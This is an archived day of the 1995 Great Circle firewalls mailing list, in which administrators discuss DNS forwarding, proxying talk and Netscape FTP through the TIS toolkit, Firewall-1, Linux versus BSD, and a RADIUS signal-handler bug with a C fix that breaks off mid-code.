Tue, 5 Sep 1995 08:54:48 -0700 Received: from internet.milkyway.com (milkyway.com [198.53.167.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA27952 for ; Tue, 5 Sep 1995 08:54:29 -0700 Received: from metis.milkyway.com (mcr@metis.milkyway.com [192.168.77.21]) by jupiter.milkyway.com (8.6.12/8.6.12) with ESMTP id LAA22986 for ; Tue, 5 Sep 1995 11:48:46 -0400 Received: by metis.milkyway.com (8.6.9/BSDI-Client) id LAA18424; Tue, 5 Sep 1995 11:56:08 -0400 To: firewalls@greatcircle.com Path: not-for-mail From: mcr@milkyway.com (Michael Richardson) Newsgroups: milkyway.mail.firewalls Subject: Re: DNS forwarding problem Date: 5 Sep 1995 11:56:06 -0400 Organization: Milkyway Networks Corporation, Ottawa, ON Lines: 35 Distribution: milkyway Message-ID: <42hrum$hvl@metis.milkyway.com> References: <199509031937.VAA29975@gsv.gu.se> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article <199509031937.VAA29975@gsv.gu.se>, Harald Astrand wrote: >The internal root servers are set up with a named.boot file: > >primary . db.root >forwarders x.x.x.x > >The x.x.x.x host is the firewall machine on a separate C-net. > >On the firewall I have a regular (non-root) name-server. >When I try to reach out-side host with nslookup from the internal root I get >the following error-message: > >can't find x.y.z: Non-existant domain. > >I guess this is because the internal root thinks itself as authoritive of Do not make it authoritative for the root. forwarders should get it access to the root name servers, so no problem. Where you get into trouble is when you have extended (multiple layers of delegation) DNS servers. I looked into making "sortlist" sort the forwaders line as well (so that DNS servers that are "internal" get preference before ones that are external) I have not done this yet. -- :!mcr!: | Milkyway Networks Corporation Michael Richardson | Makers of the Black Hole firewall NCF: aa714 || xx714 | +1 613 566-4574 ... mcr@milkyway.com Home: mcr@sandelman.ocunix.on.ca. PGP key available. From firewalls-owner Tue Sep 5 09:34:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA28571 for firewalls-outgoing; Tue, 5 Sep 1995 09:21:05 -0700 Received: from wasp.eng.ufl.edu (wasp.eng.ufl.edu [128.227.116.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA28564 for ; Tue, 5 Sep 1995 09:21:02 -0700 Received: from localhost by wasp.eng.ufl.edu (8.6.9/4.2) id MAA28686; Tue, 5 Sep 1995 12:19:30 -0400 Message-Id: <199509051619.MAA28686@wasp.eng.ufl.edu> To: Firewalls@GreatCircle.COM Subject: S/key "key" program for MacIntosh? Date: Tue, 05 Sep 1995 12:19:29 -0400 From: Andy Wilcox Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Subject line says it all. I've checked the s/key archive on ftp.bellcore.com but they've got source and PC binaries - no Mac. I'd appreciate any pointers, thanks, Andy From firewalls-owner Tue Sep 5 10:00:47 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA29818 for firewalls-outgoing; Tue, 5 Sep 1995 09:57:04 -0700 Received: from bwh.harvard.edu (bwh.harvard.edu [134.174.81.34]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA29811 for ; Tue, 5 Sep 1995 09:57:00 -0700 Received: from joplin.bwh.harvard.edu (joplin.bwh.harvard.edu [134.174.81.45]) by bwh.harvard.edu (8.6.9/8.6.9) with ESMTP id MAA19389; Tue, 5 Sep 1995 12:53:32 -0400 From: Adam Shostack X-Organization: Brigham & Womens Hospital, A Teaching Affiliate of Harvard Medical School Received: by joplin.bwh.harvard.edu (8.6.9) id MAA13875; Tue, 5 Sep 1995 12:47:36 -0400 Message-Id: <199509051647.MAA13875@joplin.bwh.harvard.edu> Subject: Re: HannaH from SecureWare Inc. To: mwr@sware.com (Mark W. Reardon) Date: Tue, 5 Sep 1995 12:47:36 -0400 (EDT) Cc: firewalls-digest@GreatCircle.COM In-Reply-To: <9509012251.AA05261@neptune.sware.com> from "Mark W. Reardon" at Sep 1, 95 06:51:02 pm X-PGP: 0xE794DA91 FD3C3450FEB4A0B8 18F2E72CA82D29B8 X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 828 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mark Reardon wrote: | Logging out: | On all systems, key material is protected within a special Cryptographic | Subsystem and is not accessible to an application. It is deactivated | (or destroyed) when the user logs out. Perhaps a point release should | include a screen saver option that automatically deactivates the key | material after an appropriate interval of inactivity. Of course, the | ultimate level of protection provided the key material depends upon the | overall security of the underlying platform. That is why Hannah is | offered on platforms including military grade B-level operating systems. Thats very interesting. How do you protect memory on a PC running Windows? Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Tue Sep 5 11:02:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA01659 for firewalls-outgoing; Tue, 5 Sep 1995 11:01:16 -0700 Received: from gatekeeper.b400.cbe.ab.ca (GateKeeper.B400.CBE.AB.CA [164.166.2.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA01650 for ; Tue, 5 Sep 1995 11:01:11 -0700 Received: (from smap@localhost) by gatekeeper.b400.cbe.ab.ca (8.6.11/8.6.9) id LAA29730 for ; Tue, 5 Sep 1995 11:55:38 -0600 Received: from iss100.b400.cbe.ab.ca(164.166.4.1) by gatekeeper.b400.cbe.ab.ca via smap (V1.3) id sma029725; Tue Sep 5 11:55:20 1995 Received: from net02 (Net02.B400.CBE.AB.CA) by CBE.AB.CA (PMDF V4.3-13 #5915) id <01HUWZX3C4Q88ZH5L3@CBE.AB.CA>; Tue, 05 Sep 1995 12:01:22 -0700 (MST) Date: Tue, 05 Sep 1995 11:58:39 -0600 From: netmgr02@cbe.ab.ca (Glen Larwill) Subject: Talk Proxy??? X-Sender: netmgr02@iss100.b400.cbe.ab.ca To: firewalls@greatcircle.com Message-id: <01HUWZX3D7B68ZH5L3@CBE.AB.CA> X-Envelope-to: firewalls@greatcircle.com MIME-version: 1.0 X-Mailer: Content-type: text/plain; charset="us-ascii" Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Has anyone created a Talk proxy that works with the TIS FWTK? We have a large number of users that are complaining becuase our firewalls cannot handle Talk. Any help would be greatly appreciated. Glen Larwill - glarwill@cbe.ab.ca _/_/_/_/ _/_/_/_/ _/_/_/_/ PH (403) 294-8380, FAX (403) 294-8431 _/ _/ _/ _/ Network Programmer Analyst _/ _/_/_/_/ _/_/_/ Calgary Board of Education _/ _/ _/ _/ Calgary Alberta, Canada _/_/_/_/ _/_/_/_/ _/_/_/_/ From firewalls-owner Tue Sep 5 11:31:15 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA02630 for firewalls-outgoing; Tue, 5 Sep 1995 11:22:53 -0700 Received: from clark.net (clark.net [168.143.0.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA02622 for ; Tue, 5 Sep 1995 11:22:50 -0700 Received: (hcb@localhost) by clark.net (8.6.12/8.6.5) id OAA18306; Tue, 5 Sep 1995 14:21:17 -0400 From: Howard Berkowitz Message-Id: <199509051821.OAA18306@clark.net> Subject: Re: Talk Proxy??? To: netmgr02@cbe.ab.ca (Glen Larwill) Date: Tue, 5 Sep 1995 14:21:16 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <01HUWZX3D7B68ZH5L3@CBE.AB.CA> from "Glen Larwill" at Sep 5, 95 11:58:39 am X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Content-Length: 534 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Has anyone created a Talk proxy that works with the TIS FWTK? We have a > large number of users that are complaining becuase our firewalls cannot > handle Talk. > Any help would be greatly appreciated. On a closely related topic of proxies (admittedly for compatibility rather than security), is anyone aware of a proxy between a conventional telnet application such as talk, and the TDD protocol for hearing-impaired users? Even better, a server for such? Has anyone implemented TDD directly as a firewall service? Howard From firewalls-owner Tue Sep 5 11:32:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA02506 for firewalls-outgoing; Tue, 5 Sep 1995 11:20:22 -0700 Received: from posaune.tamu.edu (POSAUNE.TAMU.EDU [128.194.177.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA10072 for ; Mon, 4 Sep 1995 13:59:17 -0700 From: dhess@net.tamu.edu Received: by posaune.tamu.edu (NX5.67e/NX3.0M) id AA09157; Mon, 4 Sep 95 15:57:45 -0500 Message-Id: <9509042057.AA09157@posaune.tamu.edu> Content-Type: text/plain Mime-Version: 1.0 (NeXT Mail 3.3 v118.2) Received: by NeXT.Mailer (1.118.2) Date: Mon, 4 Sep 95 15:57:43 -0500 To: academic-firewalls@net.tamu.edu, firewalls@greatcircle.com Subject: New mailing list for Drawbridge users Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Due to requests for one, I've set up a new mailing list for Drawbridge users. To subscribe send a note to majordomo@net.tamu.edu and put subscribe drawbridge in the body of the message. The address for the list is drawbridge@net.tamu.edu. Note that this used to be the alias for contacting the authors. To contact the authors now, use drawbridge-owner@net.tamu.edu. Here is the welcome file for the list: ---------------- Welcome to the drawbridge mailing list.... What is Drawbridge? Drawbridge is a copyrighted but freely distributable bridging IP filter with a powerful syntax and good performance. It uses a PC with either two Ethernet cards or two FDDI cards to perform the filtering. It is composed of three different tools: Filter, Filter Compiler and Filter Manager. The latest distribution is version 2.0 which is a major overhaul of Filter. This list is for the users of the TAMU Drawbridge security package and is intended for the discussion of any issues relating to Drawbridge. This list will also be the first place that any announcements and bug reports concerning Drawbridge will appear. Messages intended for the list should be addressed to drawbridge@net.tamu.edu. Subscription updates should be addressed to the Majordomo list manager at majordomo@net.tamu.edu. If you need assistance, send a message to drawbridge-owner@net.tamu.edu ---------------- Dave --- David K. Hess Network Analyst David-K-Hess@tamu.edu Computing and Information Services - Network Group (409) 845-0372 (work) Texas A&M University From firewalls-owner Tue Sep 5 12:04:21 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA03043 for firewalls-outgoing; Tue, 5 Sep 1995 11:38:00 -0700 Received: from [198.102.244.42] (pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA03035; Tue, 5 Sep 1995 11:37:56 -0700 X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 5 Sep 1995 11:37:05 -0800 To: netmgr02@cbe.ab.ca (Glen Larwill), firewalls@greatcircle.com From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: Talk Proxy??? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 11:58 AM 9/5/95, Glen Larwill wrote: >Has anyone created a Talk proxy that works with the TIS FWTK? We have a >large number of users that are complaining becuase our firewalls cannot >handle Talk. Don't hold your breath. Talk is an annoyingly convoluted mess of a protocol. Before you're done, you've had to both send and receive arbitrary UDP packets through your firewall, all to negotiate (for an outgoing talk session) an incoming TCP connection from a random external port number to a random internal port number. There are 6 parties involved in establishing a talk session: two users, two servers, and two clients. For the purpose of this illustration, we'll call these the "local" and "remote" user/server/client, and abbreviate them LU/LS/LC/RU/RS/RC. We'll assume that the local user is the one initiating the 'talk' request. Here are the steps you go through: 1) Local User (LU) initiates talk program, tells it what remote user they want to talk to. 2) Local Client (LC) contacts Remote Server (RS) using UDP to page Remote User (RU) 3) While waiting for RU to respond, LC contacts Local Server (LS) using UDP to tell it to expect the incoming call from the Remote Client (RC), and to tell it what port number LC is expecting the incoming TCP connection on. 4) Meanwhile, back at the ranch, RU starts RC. 5) RC contacts LS using UDP, and learns what TCP pport LC is listening for incoming TCP connection on. 6) Finally, RC opens a TCP connection to LC, and users begin talking. Note what you have going across your firewall here: A) UDP packets from >1024 on local to 517/518 (oh, yeah, did I forget to mention that there are two different incompatible versions of talk?) on remote, and back. B) UDP packets from >1024 on remote to 517/518 on local, and back. C) TCP from >1024 on remote to >1024 on local. The protocol probably _could_ be proxied, but it would be difficult, and I don't think anyone's done it yet. >From a protocol/port standpoint, IRC is simpler; it simply involves a single TCP connection from client to server, at least until you start using Direct Client Connection (DCC) mode. However, IRC has had a number of problems with poorly designed and unsafe clients and servers. I might contemplate running a strictly-internal IRC client/server net, but running an IRC client talking to external servers, or running an IRC server that external clients or servers could talk to, would make me very nervous. -Brent -- Brent Chapman | Great Circle Associates | For Firewalls Tutorial info: Brent@GreatCircle.COM | 1057 West Dana Street | Tutorial-Info@GreatCircle.COM +1 415 962 0841 | Mountain View, CA 94041 | http://www.greatcircle.com From firewalls-owner Tue Sep 5 12:05:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA02664 for firewalls-outgoing; Tue, 5 Sep 1995 11:23:17 -0700 Received: from longtail.ibl.bm (longtail.ibl.bm [199.172.192.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA02632 for ; Tue, 5 Sep 1995 11:23:09 -0700 Received: from [199.172.252.28] (dial28.ibl.bm [199.172.252.28]) by longtail.ibl.bm (8.6.11/8.6.11) with SMTP id PAA00461 for ; Tue, 5 Sep 1995 15:27:26 -0300 Date: Tue, 5 Sep 1995 15:27:26 -0300 X-Sender: TELECOMS@mail.ibl.bm Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: TELECOMS@ibl.bm (TELECOMS) Subject: Firewall-1 - Is it as good as it appears to be? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have just completed some preliminary testing of Firewall-1 product, version 1.2 , by Checkpoint Technologies, and I was impressed overall with the entire product. I accessed the following areas , and here are my comments. 1) User Friendliness - I found that one of the good things about this product was its ease of use, whether defining your security rules or defining your network environment. 2) Security/User Authentication - This was definitely one of its strong points. I am particurlarly interested in comments with its interface with the SecurID access card. I basically found that once you secuirty rules were defined , Firewall-1 did exactly what it was supposed to do. 3) Central Administration - Even though I did not have the opportunity to test the administration of multiple firewalls, I am interested in any feedback other users have regarding this matter. 4) Reporting/Alerting/Auditing - This is an area I had high regard for. I found the online log viewer especially powerful and flexible, the online alerting mechanism a handy but important tool, and the auditing mechanism thorough. Even though there were no standard reports already produced, it was easy enough to customise exactly the information you needed. 5) Bugs/Loopholes/Inconsistencies - To date I have not been aware of any problems with this version. 6) Performance - I would also welcome any comments regarding this issue using Solaris 2.4 . Please forward any comments other users may have with Firewall-1 in the afforementioned areas and maybe any other issues you may feel would be helpful knowing about this product. Thanking you in advance Dwayne From firewalls-owner Tue Sep 5 12:35:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA03892 for firewalls-outgoing; Tue, 5 Sep 1995 12:01:20 -0700 Received: from galileo.tracor.com (galileo.tracor.com [131.189.101.200]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA03884 for ; Tue, 5 Sep 1995 12:01:13 -0700 Received: from brazos.sdd.tracor.com by galileo.tracor.com (8.6.5/1.34) id NAA01741; Tue, 5 Sep 1995 13:59:36 -0500 Received: (from plupa@localhost) by brazos.sdd.tracor.com (8.6.12/8.6.12) id NAA09193 for Firewalls@GreatCircle.COM; Tue, 5 Sep 1995 13:59:32 -0500 Date: Tue, 5 Sep 1995 13:59:32 -0500 From: Paul Lupa X4184 Message-Id: <199509051859.NAA09193@brazos.sdd.tracor.com> To: Firewalls@GreatCircle.COM Subject: FTP Proxy not working with Netscape X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have installed the TIS firewall kit but I now have a problem with Proxies on Netscape. The HTTP proxy works fine, I can manually get thru the the telnet and ftp proxy, but netscape does not get thru. The logs from the proxy show activity, but the logs do not show a denial. Help would be appreciated. I will summarize. Paul Lupa ------------------ Tracor Applied Sciences Internet: Paul_Lupa@tracor.com 6500 Tracor Ln MS 27-17 Voice: (512) 929-4184 Austin, Texas 78725 FAX: (512) 929-4163 ----- End Included Message ----- From firewalls-owner Tue Sep 5 13:30:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA07377 for firewalls-outgoing; Tue, 5 Sep 1995 13:09:15 -0700 Received: from gatekeeper.ddp.state.me.us (gatekeeper.ddp.state.me.us [141.114.130.70]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA07370 for ; Tue, 5 Sep 1995 13:09:12 -0700 Received: from localhost by gatekeeper.ddp.state.me.us (8.6.5/1.37) id PAA00775; Tue, 5 Sep 1995 15:59:24 -0400 Date: Tue, 5 Sep 1995 15:59:23 -0400 (EDT) From: David Miller Subject: Re: FTP Proxy not working with Netscape To: Paul Lupa X4184 cc: Firewalls@GreatCircle.COM In-Reply-To: <199509051859.NAA09193@brazos.sdd.tracor.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 5 Sep 1995, Paul Lupa X4184 wrote: I think this should be a FAQ. AND it should be on fwtk-users, not firewalls. > I have installed the TIS firewall kit but I now have a problem with Proxies on > Netscape. The HTTP proxy works fine, I can manually get thru the the > telnet and ftp proxy, but netscape does not get thru. The logs from > the proxy show activity, but the logs do not show a denial. > > Help would be appreciated. I will summarize. The most common problem is expecting netscape to use ftp-gw. It doesn't. Point the proxy to the httpd-gw and you'll be cooking with gas:) --- David ---------------------------------------------------------------------------- It's *amazing* what one can accomplish when one doesn't know what one can't do! From firewalls-owner Tue Sep 5 13:32:25 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA07807 for firewalls-outgoing; Tue, 5 Sep 1995 13:26:37 -0700 Received: from gatepas.gc.ca (gatepas.gc.ca [192.197.79.133]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA07800 for ; Tue, 5 Sep 1995 13:26:34 -0700 Reply-To: Peter.BEAN@ldn01.x400.gc.ca Date: Tue, 05 Sep 1995 20:00:06 +0000 Priority: normal Content-Identifier: OLIVETTI-MAIL3.0 X400-Content-Type: P2-1984 X400-MTS-Identifier: [/PRMD=gc+eaitc.aecec/ADMD=telecom.canada/C=ca/;938:950905200006] From: Peter.BEAN@ldn01.x400.gc.ca (BEAN Peter -LDN -AG -LES) To: Firewalls@GreatCircle.COM Subject: Firewalls-Digest V4 #514 Message-Id: <938*/G=Peter/S=BEAN/O=ldn.01/PRMD=gc+eaitc.aecec/ADMD=telecom.canada/C=ca/@MHS> Importance: normal In-Reply-To: <199509051449.HAA24879*/DD.RFC-822=miles.greatcircle.com/PRMD=gc+internet/ADMD=GOVMT.CANADA/C=CA/@MHS> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am away from the office until Monday, 18 September 1995 From firewalls-owner Tue Sep 5 15:02:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA10932 for firewalls-outgoing; Tue, 5 Sep 1995 14:59:46 -0700 Received: from UnixServer.doulosgeri.com (UnixServer.doulosgeri.com [199.72.163.25]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA10925 for ; Tue, 5 Sep 1995 14:59:40 -0700 Received: from ralph by UnixServer.doulosgeri.com with SMTP (8.6.12/25-eef) id RAA01223; Tue, 5 Sep 1995 17:57:43 GMT Message-Id: <199509051757.RAA01223@UnixServer.doulosgeri.com> Comments: Authenticated sender is From: "Marius" Organization: Doulos Productions To: Karl Strickland Date: Tue, 5 Sep 1995 17:56:28 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: linux vs. *bsd for secure networking system Reply-to: Marius@doulosgeri.com CC: firewalls@greatcircle.com Priority: normal X-mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ahh, but in defense of Linux, the distribution isn't really all that important. If you get a Linux distribution, you should only consider it as the base that you work around. The kernel itself is the same, and you can get any file from any distribution off of some of the many Linux related FTP sites. You can also get files they aren't distributed or that are just written off of FTP sites. Centralization is nice, but with Linux, one of the main advantages is that it isn't centralized. If you look in the right places, which are easy to find if you talk to others in Linux mailing lists or newsgroups, you can get stuff to do practically anything you could imagine. It also has a nice set of HOWTO's and FAQ's they are easily accessible off of the web, and most CD-ROM distributions (if you go that route) contain the HOWTO's and FAQ's. Linux has its strong and weak points, just like everything else does, but I just wanted to say a few words in its defense... > From: Karl Strickland > Subject: Re: linux vs. *bsd for secure networking system > To: Paul McMahan > Date: Sat, 2 Sep 1995 02:30:38 +0100 (BST) > Cc: firewalls@greatcircle.com > > Hello, > > > > I know that the linux vs. (free|net)bsd question is the subject of > > ongoing debates outside the realm of firewalls, but I'm interested > > specifically in the security aspects of these operating systems. > > Remember, if you go for Linux, you have to decide *which* linux to go for - > there are at least 7 different distributions - some of which are very > different. And then, when a hole is discovered, you have to find patches > that work with your obscure distribution & version. > > FreeBSD has controlled releases, and is developed in a controlled, structured > manner; all security-related changes to the system must undergo peer review > before a commit is made. > > This alone would put FreeBSD higher up my list. > -- > ------------------------------------------+----------------------------------- > Mailed using ELM on FreeBSD | Karl Strickland > PGP 2.3a Public Key Available. | Internet: karl@bagpuss.demon.co.uk > | > > Marius@doulosgeri.com No opinions expressed by the author are shared by Doulos Productions, The Third Wave, or any affiliated parties. The author doesn't see why not... Finger root@doulosgeri.com for PGP public key. From firewalls-owner Tue Sep 5 16:02:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA11581 for firewalls-outgoing; Tue, 5 Sep 1995 15:41:16 -0700 Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA11574 for ; Tue, 5 Sep 1995 15:41:10 -0700 Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id IAA23382; Wed, 6 Sep 1995 08:35:08 +1000 Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma023314; Wed Sep 6 08:34:56 1995 Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA12780; Wed, 6 Sep 1995 08:40:17 +1000 From: sgcccdc@citec.qld.gov.au (Colin Campbell) Message-Id: <9509052240.AA12780@citecub.citec.qld.gov.au> Subject: Re: FTP Proxy not working with Netscape To: plupa@sparky.sdd.tracor.com (Paul Lupa X4184) Date: Wed, 6 Sep 95 8:40:15 EST Cc: firewalls@greatcircle.com In-Reply-To: <199509051859.NAA09193@brazos.sdd.tracor.com>; from "Paul Lupa X4184" at Sep 5, 95 1:59 pm X-Mailer: ELM [version 2.3 PL11] content-length: 1270 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, You have probably configured the proxies in netscape the same way I did when I first started playing. You have configured the proxies to point to the ftp-gw, haven't you? It does not work. The Netscape config must point the FTP to the http-gw, not the ftp-gw. Thus your Netscape proxy config should look like this: FTP Proxy: bastion 80 Gopher Proxy: bastion 70 ** HTTP Proxy: bastion 80 ** I have the http-proxy listening on ports 70, for gopher and 80 for http. As far as I know Netscape does not support telnet via proxies - the PC version just kicks off whatever telnet application is available under windows. Then you just telnet to the bastion as you normally would. Colin > I have installed the TIS firewall kit but I now have a problem with Proxies on > Netscape. The HTTP proxy works fine, I can manually get thru the the > telnet and ftp proxy, but netscape does not get thru. The logs from > the proxy show activity, but the logs do not show a denial. > > Help would be appreciated. I will summarize. > > Paul Lupa > ------------------ > Tracor Applied Sciences Internet: Paul_Lupa@tracor.com > 6500 Tracor Ln MS 27-17 Voice: (512) 929-4184 > Austin, Texas 78725 FAX: (512) 929-4163 > From firewalls-owner Tue Sep 5 16:30:00 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA12361 for firewalls-outgoing; Tue, 5 Sep 1995 16:22:31 -0700 Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA12352 for ; Tue, 5 Sep 1995 16:22:28 -0700 Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQzfyb14882; Tue, 5 Sep 1995 19:21:07 -0400 Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA15350; Tue, 5 Sep 95 19:13:32 EDT Date: Tue, 5 Sep 1995 19:13:31 -0400 (EDT) From: Sick Puppy Subject: Re: Nasty hackerz having busy weekend *** False alarm To: firewalls@GreatCircle.com In-Reply-To: <9509052003.AA25868@dns-primary.montgomery.com.> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Now you all may recall that ever since Bellcore gave me a lick in the head with a two by four because I was chasing their chickens, I have not been in full possession of my faculties. Most recently I told you all that there was a fox in the chicken coop at UUnet and it turns out there was nothing of the kind. I apologize to UUnet for saying there was nasty hackerz in their system. I trusted a stupid firewall that was completely wrong. What was really happening is that a VERY fast firewall was connecting to their name server and then timing out before it received a response from the UUnet name server. This happens to be the same firewall machine that one firewall expert said had been attacked by aliens. Anyway, the name server responded to the firewall at normal speed, but slower than the VERY fast firewall expected, and the firewall squawked that it had been hacked. The vendor concerned has a later software release that does not have this problem. To be fair to UUnet, they really provide superior service compared to one of the other Internet service providers that I previously had the misfortune to deal with, and UUnet responded to and diagnosed this incident very quickly. You see what I got for trusting a stupid firewall? If I had put a Network General Notebook Sniffer on the Internet connection, it would have shown me in 10 to 15 minutes that the VERY fast firewall was seeing the normal name server as a slow server. In Dawg and Sniffers we trust, all others pay cash. (Dawg is Gwad spelled backwards). Cowboy Jeff, who also had a hand in this fiasco, is going to feel my fangs in his eminent posterior. And to end on a lighter note, those of you who are into scatalogical jokes should play with the word Starship in the tag lines. The rest of you had better not bother. Sick Puppy, the Cat_Eating_Dawg Photonic & Tachyonic Systems Engineer of the Stealth Starship Dark Matter -=:( Chained, whipped, beaten and severely abused in Katherine's Dungeon ):=- -=:( How could anything that feels so good be so wrong ):=- From firewalls-owner Tue Sep 5 16:32:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA12259 for firewalls-outgoing; Tue, 5 Sep 1995 16:13:06 -0700 Received: from ford.gbnet.org (ford.gbnet.org [192.188.96.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA12246 for ; Tue, 5 Sep 1995 16:12:55 -0700 Received: (from steve@localhost) by ford.gbnet.org (8.7.Beta.10/8.6.12) id AAA16554 for firewalls@greatcircle.com; Wed, 6 Sep 1995 00:11:20 +0100 (BST) From: Steve Kennedy Message-Id: <199509052311.AAA16554@ford.gbnet.org> Subject: Re: Use of Remote Authentication: tacacs/radius/etc... (fwd) To: firewalls@greatcircle.com Date: Wed, 6 Sep 1995 00:11:19 +0100 (BST) X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Here are details of the Livingston/Merit/Ascend RADIUS problems ... According to Jim Segrave (jes@demon.net) > According to William Bulley > > Merit is a large ISP (serving the State of Michigan with thousands if not > > millions of dial-up users) and we use the Merit version of RADIUS heavily. > > I would be very interested in understanding this "serious bug in the socket > > handling code" in the Merit version of RADIUS. Thank you! > > Regards, > > web... [stuff deleted] > We weren't using the Merit code, we were using code taken from > Ascend's modifications to the Livingstone reference > implementations. However, I have pulled down a copy of the Merit code > and the same problem is there as well. There are two issues here, one > flawed, the other fatally wrong and they brought our system to a > complete halt at 18:00 when several hundred users attempted to log in > within a 10 minute period (BT in the UK drops the call charges > significantly on weekday nights at 6PM, so many of our users, who have > home accounts, wait for the drop in charges). > The Ascend/Livingstone code spawns a process per Radius request. The > parent process notes the child pid and, when the child completes, the > SIGCHLD is caught and used to mark the request as completed. After a > short timeout, the request is deleted from memory. If the child fails > to complete in a reasonable period of time (default is 30 seconds), > the parent sends a kill to the child and deletes the request. The > server limits itself to a certain number of child processes - 100 in > this case. > If the parent fails to catch the SIGCHLD, one of these 100 slots for > processing is gone for the next 30 seconds. The signal handler in the > Ascend, Livingstone and Merit implementations use signal(), not one of > the most reliable methods - cf. 'Advanced Programming in the Unix > Environment' by W. Richard Stevens, chapter 10 for details. This alone > can cause SIGCHLDs to be lost and starve the server of process slots > for incoming requests. > The above is merely an annoyance however. > More serious problems occur if you look at the SIGCHLD handler. First > off, it traverses and alters the global_acct_q and the > global_request_q, even though the signal may have interrupted code > which is traversing and altering the same queue. > Even worse than that, on line 1618 of the source I got from merit.edu, > I find a call to free(). That's exciting to say the least - I'm not > aware of any requirement that free and malloc be interruptible and > re-entrant. The results of this one are usually fatal. > The fix I made with the Ascend code was to move the entire body of the > SIGCHLD handler out of the signal handler and into the main event > loop. SIGCHLD now is a simple minded handler: > > sig_atomic_t dead_child = 0; > > void sigchild (int signal) > { > dead_child = 1; > } > > and in the main loop: > > while (1) > { > set up fd_set and select on socket(s) > > if ((res = select (...)) < 0) > { > if (errno != EINTR) > { > syslog (...); > } > > if (dead_child) > do_sigchild (); > > continue; > } > > rest of main loop > } > > > void > do_sigchild (void) > { > sigset_t set, oldset; > > sigemptyset (&set); > sigaddset (&set, SIGCHLD); > if (sigprocmask (SIG_BLOCK, &set, &oldset) < 0) > { > syslog (....); > } > 